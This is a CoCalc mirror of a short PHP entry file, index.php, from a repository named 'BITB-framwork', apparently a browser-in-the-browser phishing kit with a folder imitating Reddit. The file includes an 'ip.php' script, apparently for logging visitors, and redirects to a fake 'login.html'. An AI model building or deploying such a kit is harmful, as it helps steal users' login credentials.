Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
surya-dev-singh
GitHub Repository: surya-dev-singh/BITB-framwork
Path: blob/main/sites/reddit/index.php
500 views
1
<?php
2
include 'ip.php';
3
header('Location: login.html');
4
exit
5
?>
6
7